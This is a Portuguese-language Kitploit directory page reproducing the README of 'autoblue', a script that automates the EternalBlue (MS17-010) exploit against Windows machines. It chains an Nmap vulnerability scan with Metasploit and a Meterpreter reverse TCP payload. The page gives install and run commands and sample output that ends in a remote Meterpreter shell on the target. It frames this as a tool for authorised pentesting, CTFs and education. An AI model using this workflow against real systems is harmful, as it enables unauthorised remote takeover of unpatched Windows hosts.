Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
autoblue — AutoBlue - Ferramenta automatizada de exploração do EternalBlue (CVE-2017-0144 / MS17-010) que utiliza Nmap e Metasploit para hacking ético, testes de penetração e desafios CTF. Estritamente para uso autorizado e educacional! | Kitploit
Ferramentas/GitHubGitHub/atithkhawas/autoblue
Scanners de VulnerabilidadesGeração de PayloadsExploraçãoPós-ExploraçãoCTFTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHubatithkhawas/autoblue

autoblue

AutoBlue - Ferramenta automatizada de exploração do EternalBlue (CVE-2017-0144 / MS17-010) que utiliza Nmap e Metasploit para hacking ético, testes de penetração e desafios CTF. Estritamente para uso autorizado e educacional!

Ver Repositório
413há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

AUTOBLUE: Ferramenta Automatizada de Exploração EternalBlue

AUTOBLUE é uma ferramenta de automação projetada para explorar a vulnerabilidade EternalBlue (CVE-2017-0144) em máquinas Windows. A ferramenta integra o poder do Nmap para varredura de vulnerabilidades e do Metasploit's msfconsole para exploração, permitindo que os usuários identifiquem automaticamente sistemas vulneráveis e lancem o exploit EternalBlue para obter acesso remoto ao alvo.

Esta ferramenta é projetada principalmente para profissionais de segurança, testadores de penetração e hackers éticos que trabalham em ambientes controlados e autorizados, como desafios Capture The Flag (CTF), engajamentos de teste de penetração ou configurações de laboratório. AUTOBLUE permite que os usuários explorem a vulnerabilidade EternalBlue com intervenção manual mínima, bastando inserir o endereço IP do alvo.

Recursos

  • Varredura Automatizada de Vulnerabilidades: Usa o Nmap para verificar a vulnerabilidade EternalBlue (CVE-2017-0144) na máquina alvo.

  • Exploração Sem Costura: Utiliza o Metasploit's msfconsole para lançar o exploit EternalBlue automaticamente.

  • Configuração Simples: Requer apenas um endereço IP alvo e um ambiente de trabalho com Nmap e Metasploit instalados.

  • Relatório de Saída: Gera saída indicando sucesso ou falha da tentativa de exploração.

Índice

  • Pré-requisitos

  • Instalação

  • Uso

  • Como Funciona

  • Considerações de Segurança

  • Contribuição

Licença

  • Agradecimentos

  • Aviso Legal

  • Pré-requisitos:

    Antes de usar o AUTOBLUE, certifique-se de que as seguintes ferramentas estão instaladas na sua máquina:

    Nmap: Uma ferramenta de varredura de rede para detectar máquinas vulneráveis.

    Metasploit Framework: Uma plataforma de teste de penetração que inclui exploits para EternalBlue.

    Instalar o Nmap:

    • No Linux (baseado em Debian):

    Copiar código

    root@kitploit:~
          sudo apt update
    

    e

    root@kitploit:~
          sudo apt install nmap
    

    No Windows ou macOS, baixe o Nmap do site oficial.

    Instalar o Metasploit:

    No Linux (baseado em Debian):

    Copiar código

    root@kitploit:~
          sudo apt update
    

    e

    root@kitploit:~
         sudo apt install metasploit-framework
         
    

    No Windows ou macOS, baixe o Metasploit do site oficial.

    Instalação:

    Para instalar o AUTOBLUE, siga estas etapas:

    • Clone o repositório:

      root@kitploit:~
        git clone https://github.com/AtithKhawas/autoblue.git
      

      e

      root@kitploit:~
           cd autoblue
      

    Certifique-se de que o Nmap e o Metasploit estão instalados corretamente como pré-requisitos.

    • Torne o script executável:

      root@kitploit:~
      chmod +x autoblue.sh
      

    Uso:

    AUTOBLUE é projetado para automatizar a varredura e exploração da vulnerabilidade EternalBlue. Veja como usá-lo:

    • Execute a Ferramenta

    Para usar o AUTOBLUE, execute o seguinte comando no seu terminal:

    Copiar código

    root@kitploit:~
         ./autoblue.sh 
    

    Saída:

    root@kitploit:~
         ┌──(root㉿kali)-[/home/Elliot] 
         └─# ./autoblue.sh 
         ============================================
         ********************************************
         AutoBlue    - EternalBlue Exploit Automation
         ********************************************
         ********************************************
         ------------------------Made by ATITH KHAWAS
         ============================================
         Enter Target IP Address:
    

    Ele solicitará o Endereço IP do Alvo e o seu.

    Exemplo

    root@kitploit:~
          Enter Target IP Address: Alvo<Endereço IP>
          Enter Your IP Address: Seu <Endereço IP>
    

    Assim que você executar a ferramenta, ela começará a varredura com o Nmap:

    Saída-1

    root@kitploit:~
     Target IP Address: ***.***.**.**
     [+] Scanning Target for MS17-010 Vulnerability...
     Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 12:41 EST
     Nmap scan report for ***.***.**.**
     Host is up (0.19s latency).
    
     PORT    STATE SERVICE
     445/tcp open  microsoft-ds
    
     Host script results:
     | smb-vuln-ms17-010: 
     |   VULNERABLE:
     |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
     |     State: VULNERABLE
     |     IDs:  CVE:CVE-2017-0143
     |     Risk factor: HIGH
     |       A critical remote code execution vulnerability exists in Microsoft SMBv1
     |        servers (ms17-010).
     |           
     |     Disclosure date: 2017-03-14
     |     References:
     |       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
     |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
     |_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
    
     Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
     [+] Target is VULNERABLE to EternalBlue!
    

    É aqui que o trabalho real começa, reduzindo significativamente o processo demorado. Se o alvo for vulnerável, ele lança automaticamente o Msfconsole e define RHOSTS, PAYLOAD, LHOST e LPORT, sendo a porta padrão 4444.

    Saída-2

    root@kitploit:~
          [+] Launching Metasploit...
          [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
          RHOSTS => ***.***.**.**
          PAYLOAD => windows/x64/meterpreter/reverse_tcp
          LHOST => ***.***.**.**
          LPORT => 4444
          [*] Started reverse TCP handler on ***.***.**.**:4444 
    

    E nos fornece o shell Meterpreter do alvo.

    Saída-3

    root@kitploit:~
           [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
           [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
           [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    
           meterpreter > pwd
           C:\Windows\system32
    

    Como Funciona:

    • Varredura com Script Nmap: A ferramenta usa primeiro o Nmap Script Scan (--script smb-vuln-ms17-010) para detectar se a máquina alvo é vulnerável ao exploit EternalBlue. Ela verifica se a porta 445 está aberta e tenta identificar vulnerabilidades SMB.

    • Exploração com Metasploit: Se a máquina alvo for considerada vulnerável, o AUTOBLUE prossegue para lançar o exploit EternalBlue usando o Metasploit's msfconsole. O script configurará e enviará o payload necessário para explorar a vulnerabilidade.

    • Shell Reverso: Se o exploit for bem-sucedido, um shell reverso será aberto para fornecer uma interface de linha de comando na máquina vítima.

    • Feedback: A ferramenta fornece feedback ao longo do processo, incluindo se o alvo foi explorado com sucesso, e gera qualquer informação relevante (por exemplo, endereço IP do shell reverso).

    Considerações de Segurança:

    • Uso Legal: Esta ferramenta deve ser usada apenas em ambientes autorizados. Certifique-se de ter permissão explícita para testar a máquina alvo e que isso não seja ilegal em sua jurisdição.

    • Entrada do Usuário: Certifique-se de que apenas IPs confiáveis sejam inseridos na ferramenta para evitar uso indevido. Executar esta ferramenta em sistemas não confiáveis pode levar a incidentes de segurança.

    • Segurança do Payload: O payload de shell reverso usado nesta ferramenta é inerentemente arriscado. Não exponha a máquina de ataque ou seus listeners a redes não confiáveis.

    • Mantenha as Dependências Atualizadas: Certifique-se de atualizar regularmente o Nmap e o Metasploit para mitigar vulnerabilidades de segurança conhecidas nessas ferramentas.

    Contribuição:

    Contribuições para o projeto AUTOBLUE são bem-vindas. Se você tiver sugestões, melhorias ou correções de bugs, sinta-se à vontade para bifurcar o repositório e criar um pull request.

    Licença:

    Esta ferramenta é de código aberto e distribuída sob a Licença MIT. Você é livre para usar, modificar e distribuir o software em seus próprios projetos. No entanto, você deve incluir este aviso em todas as cópias ou partes substanciais do software.

    Agradecimentos:

    • Nmap: Por fornecer a funcionalidade essencial de varredura de vulnerabilidades.

    • Metasploit: Por fornecer a estrutura para explorar a vulnerabilidade EternalBlue.

    • Pesquisadores de Segurança: Por descobrir e divulgar publicamente a vulnerabilidade EternalBlue, o que ajudou a proteger sistemas em todo o mundo.

    Aviso Legal:

    AUTOBLUE é uma ferramenta destinada apenas para uso educacional e ético. Os autores não são responsáveis por quaisquer ações ilegais tomadas usando esta ferramenta. É sua responsabilidade garantir que você tenha permissão explícita para realizar testes de penetração em qualquer sistema.

    Use esta ferramenta por sua própria conta e risco. Sempre realize atividades de teste de penetração em um ambiente seguro e legal.

    Baixar ferramenta